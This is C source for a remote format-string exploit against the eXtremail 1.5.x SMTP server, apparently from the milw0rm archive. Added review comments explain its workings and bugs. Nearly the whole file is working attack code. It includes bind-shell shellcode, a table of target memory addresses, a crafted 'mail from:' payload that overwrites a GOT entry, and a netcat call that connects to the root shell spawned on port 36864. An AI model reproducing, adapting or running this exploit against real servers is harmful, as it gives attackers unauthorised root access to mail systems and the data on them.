/****************************************************************/
|
|
/* Linux eXtremail 1.5.x Remote Format Strings Exploit */
|
|
/* */
|
|
/* */
|
|
/* By B-r00t - 02/07/2003 */
|
|
/* */
|
|
/* Versions: Linux eXtremail-1.5-8 => VULNERABLE */
|
|
/* Linux eXtremail-1.5-5 => VULNERABLE */
|
|
/* Exploit uses format strings bug in fLog() of smtpd to bind a */
|
|
/* r00tshell to port 36864 on the target eXtremail server. */
|
|
/* */
|
|
/****************************************************************/
|
|
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
#include <arpa/inet.h>
|
|
#include <unistd.h>
|
|
|
|
#define EXPLOIT "eXtreme"   // program name shown in the banner and by usage()
#define DEST_PORT 25        // TCP port get_sock() connects to (SMTP)

// Prototypes
int get_sock (char *host);      // connects the global socketfd to host:DEST_PORT; exits on failure
int send_sock (char *stuff);    // send()s the NUL-terminated string on socketfd; exits on failure
int read_sock (void);           // recv()s one chunk from socketfd, prints it, returns the byte count
void usage (void);              // prints syntax plus the targets[] table, then exit(-1)
int do_it (void);               // builds and sends the payload, then exit(0); never returns

// Globals
int socketfd, choice;           // socketfd: connected socket; choice: index into targets[] (from argv[2])
unsigned long GOT, RET;         // set in do_it() from targets[choice].got / .ret
char *myip;                     // declared but never referenced in this file
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";   // first SMTP command sent after the banner is read

// Raw payload bytes appended to the request in do_it() via strncat().
// strncat stops at the first NUL, so the array must contain none; it ends
// with the array's own terminator. A run of 0x90 bytes followed by opaque
// machine code — not disassembled here.
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";
|
|
|
|
|
|
/* One row per supported build, selected by argv[2] (global `choice`).
 * The table ends at the row whose systemtype is NULL; usage() walks it
 * up to that sentinel. Field meanings as used by do_it():
 *   systemtype - label printed by usage() and in do_it()'s summary
 *   got        - copied to global GOT; split into four bytes and placed in the request
 *   ret        - copied to global RET; its four bytes drive the %.Nu widths in the format string
 *   pad        - number of 'a' characters inserted after "mail from: "
 *   buf        - display only: printed as the "max bytes" figure next to strlen(buf), never enforced
 *   pos        - first positional-argument index used in the %N$n directives
 */
struct {
    char *systemtype;
    unsigned long got;
    unsigned long ret;
    int pad;
    int buf;
    int pos;
} targets[] = {
    // Confirmed targets tested by B-r00t.
    { "RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)", 0x0813b19c, 0xbefff1e8, 1, 266, 44},
    { "Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)", 0x0813b19c, 0xbefff1b8, 1, 266, 44},
    { "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)", 0xbefff0c8, 0xbefff1d4, 1, 266, 44},
    // Looks like a placeholder row (marker-style values), not a real build — unconfirmed.
    { "eXtremail V1.5 DEBUG", 0x44434241, 0xaaaaaaaa, 1, 266, 44},
    { 0 }   /* sentinel: systemtype == NULL */
};
|
|
|
|
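int main ( int argc, char *argv[] )
{
    /* Entry point: parses `<ip> <target-index>`, connects, reads the banner,
     * sends HELO, reads the reply, then hands over to do_it(). Bad arguments
     * go to usage() (which exits); socket failures exit inside get_sock(),
     * read_sock() and send_sock(). do_it() itself ends with exit(0). */
    char *TARGET = "TARGET";
    char *end = NULL;
    long parsed;
    int ntargets;

    printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n",
            EXPLOIT);

    if (argc < 3)
        usage ();

    /* Count the table at run time instead of hard-coding the bound 3, so
     * adding a row to targets[] cannot desynchronise this check. */
    for (ntargets = 0; targets[ntargets].systemtype; ntargets++)
        ;

    /* strtol instead of atoi: non-numeric or trailing-junk input ("2x", "abc")
     * is rejected rather than silently mapped to 0 (the first target). */
    parsed = strtol (argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || parsed < 0 || parsed >= ntargets)
        usage ();
    choice = (int) parsed;

    /* argv[1] is exported so do_it() can reference it as ${TARGET} inside its
     * system() command line. get_sock() runs inet_aton() on the same string
     * and exits if it is not a numeric address, so anything inet_aton()
     * rejects never reaches that shell. */
    setenv (TARGET, argv[1], 1);

    get_sock (argv[1]);
    sleep (1);
    read_sock ();      /* server greeting */
    sleep (1);
    send_sock (helo);
    sleep (1);
    read_sock ();      /* HELO response */
    sleep (1);
    do_it ();          /* does not return */
    return 0;
}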
|
|
|
|
|
|
void usage (void)
{
    /* Prints the command-line syntax and one numbered line per row of
     * targets[], then terminates the process with exit(-1). Never returns. */
    int idx = 0;

    printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
    printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);

    /* The table is terminated by a row whose systemtype is NULL. */
    while (targets[idx].systemtype != NULL) {
        printf ("\n%d\t%s", idx, targets[idx].systemtype);
        idx++;
    }

    printf ("\n\nOn success a r00tshell will be spawned on port 36864.\n\n");
    exit (-1);
}
|
|
|
|
|
|
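int get_sock (char *host)
{
    /* Opens a TCP connection to host:DEST_PORT and stores the descriptor in
     * the global socketfd. Returns socketfd on success (the original fell
     * off the end of a non-void function). On failure prints a diagnostic
     * and exits: -1 socket() failed, -2 host is not a numeric IPv4 address,
     * -3 connect() failed. */
    struct sockaddr_in dest_addr = {0};   /* also zeroes sin_zero, replacing the explicit memset */

    if ((socketfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
        /* perror appends ": <reason>\n" itself; the "\n" that used to be
         * inside the message split the diagnostic across two lines. */
        perror ("Socket Error!");
        exit (-1);
    }

    dest_addr.sin_family = AF_INET;
    dest_addr.sin_port = htons (DEST_PORT);
    /* inet_aton() accepts only numeric IPv4 forms. It does not set errno,
     * so perror() would have printed a misleading reason here. This check is
     * also what keeps main()'s ${TARGET} export to a plain address before
     * do_it() passes it to system(). */
    if (!inet_aton (host, &dest_addr.sin_addr)) {
        fprintf (stderr, "inet_aton problems\n");
        exit (-2);
    }

    if (connect (socketfd, (struct sockaddr *) &dest_addr, sizeof dest_addr) == -1) {
        perror ("Connect failed!");
        close (socketfd);
        exit (-3);
    }

    printf ("\n\nConnected to %s\n", host);
    return socketfd;
}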
|
|
|
|
|
|
|
|
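int send_sock (char *stuff)
{
    /* Writes the whole NUL-terminated string `stuff` to the global socketfd
     * and echoes it as "Send:\t<data>". Returns the number of bytes sent,
     * which equals strlen(stuff). On a send() error: perror, close the
     * socket and exit(4) — callers never observe a failure.
     * Loops on short sends; the original returned after one send() call, so
     * a partial write was reported as success. */
    size_t len = strlen (stuff);
    size_t done = 0;

    while (done < len) {
        ssize_t bytes = send (socketfd, stuff + done, len - done, 0);
        if (bytes == -1) {
            perror ("Send error");
            close (socketfd);
            exit (4);
        }
        done += (size_t) bytes;
    }

    printf ("Send:\t%s", stuff);
    return (int) done;
}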
|
|
|
|
|
|
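int read_sock (void)
{
    /* Reads one chunk (at most sizeof buffer - 1 bytes) from the global
     * socketfd, prints it as "Recv:\t<data>" and returns the byte count
     * (0 when the peer has closed). On a recv() error: perror, close the
     * socket and exit(4). */
    char buffer[200];
    ssize_t bytes;

    memset (buffer, '\0', sizeof buffer);
    /* Leave the last byte untouched so the buffer is always NUL-terminated
     * for the %s below; the original passed the full size, so a reply of
     * 200 bytes or more let printf read past the end of the array. */
    bytes = recv (socketfd, buffer, sizeof buffer - 1, 0);
    if (bytes == -1) {
        perror ("recv error");   /* was "send error" — misleading on a read failure */
        close (socketfd);
        exit (4);
    }

    printf ("Recv:\t%s", buffer);
    return (int) bytes;
}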
|
|
|
|
|
|
int do_it (void)
{
    /* Builds the "mail from:" request for targets[choice], prints a summary,
     * sends it on the global socketfd, closes the socket and then runs
     * netcat through system(). Never returns: ends with exit(0).
     * Reads globals choice, socketfd, shellcode; writes globals GOT and RET. */
    char format[200], buf[500], *bufptr, *p;
    int loop, sofar = 0;
    int PAD = targets[choice].pad;
    int POS = targets[choice].pos;
    /* BUG(review): r, g and w are declared with 3 elements, but index 3 is
     * written below (r[3], g[3], w[3]) and strncat reads 4 bytes of g. That is
     * an out-of-bounds access (undefined behaviour); what actually lands in
     * the buffer depends on how the compiler laid out these locals. */
    unsigned char r[3], g[3], w[3];

    /* Split ret into its four bytes, least significant first. */
    RET = targets[choice].ret;
    r[0] = (int) (RET & 0x000000ff);
    r[1] = (int)((RET & 0x0000ff00) >> 8);
    r[2] = (int)((RET & 0x00ff0000) >> 16);
    r[3] = (int)((RET & 0xff000000) >> 24);

    /* Same for got. */
    GOT = targets[choice].got;
    g[0] = (int) (GOT & 0x000000ff);
    g[1] = (int)((GOT & 0x0000ff00) >> 8);
    g[2] = (int)((GOT & 0x00ff0000) >> 16);
    g[3] = (int)((GOT & 0xff000000) >> 24);


    // Start buf
    bufptr = buf;
    bzero (bufptr, sizeof(buf));
    /* Copies the 11 characters without a terminator; buf was zeroed above so
     * it remains a valid string. */
    strncpy (buf, "mail from: ", strlen("mail from: "));
    /* Running count of characters the receiving printf is assumed to have
     * emitted so far. Why it starts at 19 rather than strlen("mail from: ")
     * == 11 is not explained in the source. */
    sofar = 19;

    // Do padding
    for (loop=0; loop<PAD; loop++)
        strncat (buf, "a", 1);
    sofar = sofar+PAD;

    //1st GOT addy
    /* g is unsigned char[] passed where strncat expects char *. strncat stops
     * at a NUL byte, so an address containing 0x00 would be cut short here. */
    strncat (buf, g, 4);

    //2nd GOT addy
    p = &g[0];
    (*p)++;          /* bump the low byte: the next copy is got+1 */
    strncat (buf, g, 4);

    // 3rd GOT addy
    p = &g[0];
    (*p)++;          /* got+2 */
    strncat (buf, g, 4);

    // 4th GOT addy
    p = &g[0];
    (*p)++;          /* got+3 */
    strncat (buf, g, 4);
    sofar = sofar+16;   /* four 4-byte addresses appended */

    /* For each byte of RET compute w[loop], the number of characters that
     * advances the running total to r[loop] modulo 256. Because w is unsigned
     * char, the assignment reduces the value mod 256, so all three branches
     * amount to (r[loop] - sofar) mod 256 — including the third one once
     * sofar has grown past 256 and (256-sofar)+r[loop] goes negative. */
    for (loop=0; loop<4; loop++) {
        if (r[loop] > sofar) {
            w[loop] = r[loop]-sofar;
        } else
        if (r[loop] == sofar) {
            w[loop] = 0;
        }else
        if (r[loop] < sofar) {
            w[loop] = (256-sofar)+r[loop];
        }
        sofar = sofar+w[loop];
    }

    /* Each "%%.%du%%%d$n" expands to "%.<w>u%<pos>$n": a width directive
     * followed by a positional %n, for pos = POS .. POS+3. */
    bufptr = format;
    bzero (bufptr, sizeof(format));
    sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",
             w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
    /* No check that buf (500 bytes) can hold prefix + PAD + 16 + format +
     * shellcode; the table's buf field (266) is only printed, never enforced,
     * so a larger PAD could overrun buf. */
    strncat (buf, format, sizeof(format));
    strncat (buf, shellcode, sizeof(shellcode));

    // Summarise
    /* Format/argument mismatches: GOT and RET are unsigned long (%lx) and
     * strlen() returns size_t (%zu). Undefined in general; presumably went
     * unnoticed on the 32-bit systems this was written for. */
    printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
    printf ("\nWrite Addy:\t\t0x%x", GOT);
    printf ("\nRET (shellcode):\t0x%x", RET);
    printf ("\nPAD (alignment):\t%d", PAD);
    printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf),
            targets[choice].buf);
    printf ("\nSending it ... \n");
    sleep(1);

    // Ok lets Wack it!
    send_sock (buf);
    sleep (1);
    close (socketfd);
    printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 ....!!!!!\n\n\n");
    sleep(3); // May take time to spawn a shell
    /* Runs netcat through the shell. ${TARGET} is argv[1], exported by
     * main(); whatever the shell would interpret in that string reaches it
     * here, so the inet_aton() check in get_sock() is the only thing that
     * restricts it to a plain address. The exit status of nc is not
     * examined beyond the "||" fallback message. */
    system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
    exit (0);
}
|
|
|
|
// milw0rm.com [2003-07-02]
|